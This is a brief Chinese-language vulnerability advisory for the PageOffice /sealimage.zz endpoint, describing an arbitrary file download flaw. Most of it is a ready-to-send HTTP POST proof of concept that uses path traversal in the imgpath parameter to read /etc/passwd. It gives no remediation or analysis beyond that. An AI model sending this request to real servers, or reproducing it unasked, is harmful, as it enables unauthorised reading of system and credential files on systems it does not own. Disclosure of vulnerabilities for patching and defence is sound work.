PageOffice /sealimage.zz 文件读取漏洞

日期: 2025-09-19 | 影响软件: PageOffice | POC: 已公开

漏洞描述

PageOffice 存在任意文件下载漏洞

PoC代码

POST /sealimage.zz?imgtype=*/*&imgpath=../../../../../../../../../etc/passwd HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0

相关漏洞推荐